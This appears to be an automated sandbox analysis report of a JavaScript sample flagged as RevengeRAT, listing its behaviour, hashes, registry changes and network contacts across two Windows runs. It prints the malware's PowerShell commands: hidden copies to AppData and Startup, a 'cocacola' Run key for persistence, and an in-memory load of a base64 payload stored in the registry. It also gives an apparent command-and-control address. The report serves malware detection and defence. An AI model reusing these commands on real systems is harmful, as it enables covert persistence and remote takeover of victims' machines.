Analysis Overview
SHA256
d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd
Threat Level: Known bad
The file 213124dados cancelar a reserva.js was found to be: Known bad.
Malicious Activity Summary
RevengeRAT
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Checks computer location settings
Adds Run key to start application
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-15 19:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-15 19:46
Reported
2024-10-15 19:48
Platform
win7-20241010-en
Max time kernel
118s
Max time network
148s
Command Line
Signatures
RevengeRAT
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\213124dados cancelar a reserva.js | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\cocacola = "C:\\Users\\Admin\\AppData\\Roaming\\213124dados cancelar a reserva.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\213124dados cancelar a reserva.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\213124dados cancelar a reserva.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\213124dados cancelar a reserva.js'));wscript 'C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js'"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value 'C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js' -PropertyType String -Force;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\213124dados cancelar a reserva.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js'))"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
Network
| Country | Destination | Domain | Proto |
| US | 54.146.241.16:5222 | tcp |
Files
memory/2420-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp
memory/2420-6-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2420-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2420-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2420-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
memory/2420-7-0x00000000020F0000-0x00000000020F8000-memory.dmp
memory/2420-5-0x000000001B590000-0x000000001B872000-memory.dmp
memory/2420-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js
| MD5 | 5508be73f4288131312fe9dcbe64322c |
| SHA1 | f579ae533109afddd4d9e528c7c393035cd80e7a |
| SHA256 | d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd |
| SHA512 | 0f22d6e8378164326cf1634061281e765b29e3b0bef2eb2f1c3fd30d84a1554233c8b1eb930b6df431e982c0ce46b22f451b491892bc2b1c0a1ae60a66e2356f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 49af3ffd45d75d4a5e965defc23c7f9e |
| SHA1 | 048004c07cb1391e78bbdf927629585b6766f823 |
| SHA256 | 9e4e2a4a50b99e115ae50fc12433b6450ee8c40b9aa0cdc8fba757317404439d |
| SHA512 | 3e7bc486be3d65e0f2ee8fd5c48582c435304661650ed9b2f21928ad80902e6e9a429a573610521183458accc9dc8d08530c3f7c79c8a536c17f7dbaa640e7c9 |
memory/2720-30-0x0000000002980000-0x000000000298A000-memory.dmp
memory/2420-31-0x000007FEF628E000-0x000007FEF628F000-memory.dmp
memory/2420-32-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-15 19:46
Reported
2024-10-15 19:48
Platform
win10v2004-20241007-en
Max time kernel
142s
Max time network
148s
Command Line
Signatures
RevengeRAT
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\213124dados cancelar a reserva.js | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cocacola = "C:\\Users\\Admin\\AppData\\Roaming\\213124dados cancelar a reserva.js" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\213124dados cancelar a reserva.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\213124dados cancelar a reserva.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\213124dados cancelar a reserva.js'));wscript 'C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js'"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value 'C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js' -PropertyType String -Force;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\213124dados cancelar a reserva.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js'))"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 54.146.241.16:5222 | tcp | |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.241.146.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
memory/2304-0-0x00007FFD9EE53000-0x00007FFD9EE55000-memory.dmp
memory/2304-10-0x00000242D1120000-0x00000242D1142000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h3hczgr4.qnv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2304-11-0x00007FFD9EE50000-0x00007FFD9F911000-memory.dmp
memory/2304-12-0x00007FFD9EE50000-0x00007FFD9F911000-memory.dmp
memory/2304-13-0x00000242D1860000-0x00000242D18A4000-memory.dmp
C:\Users\Admin\AppData\Roaming\213124dados cancelar a reserva.js
| MD5 | 5508be73f4288131312fe9dcbe64322c |
| SHA1 | f579ae533109afddd4d9e528c7c393035cd80e7a |
| SHA256 | d213e4762cbc78007d9f45a852ea498265a8bd0c242c93b23e624f302e059ddd |
| SHA512 | 0f22d6e8378164326cf1634061281e765b29e3b0bef2eb2f1c3fd30d84a1554233c8b1eb930b6df431e982c0ce46b22f451b491892bc2b1c0a1ae60a66e2356f |
memory/2304-16-0x00000242D1930000-0x00000242D19A6000-memory.dmp
memory/3428-45-0x0000021BCC480000-0x0000021BCC48A000-memory.dmp
memory/2304-46-0x00007FFD9EE53000-0x00007FFD9EE55000-memory.dmp
memory/2304-47-0x00007FFD9EE50000-0x00007FFD9F911000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |